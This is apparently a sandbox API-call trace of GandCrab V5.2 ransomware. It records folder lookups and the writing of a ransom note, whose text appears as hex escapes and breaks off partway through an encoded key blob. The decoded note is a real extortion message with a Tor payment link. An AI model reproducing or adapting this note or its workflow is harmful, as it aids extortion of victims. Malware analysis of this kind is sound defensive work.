[0072.296] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.296] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.296] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.296] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.297] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.297] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.297] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.297] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.297] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.297] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.297] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.297] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\\\TITWMVJL-DECRYPT.txt") returned 73 [0072.297] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\mmc\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.298] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x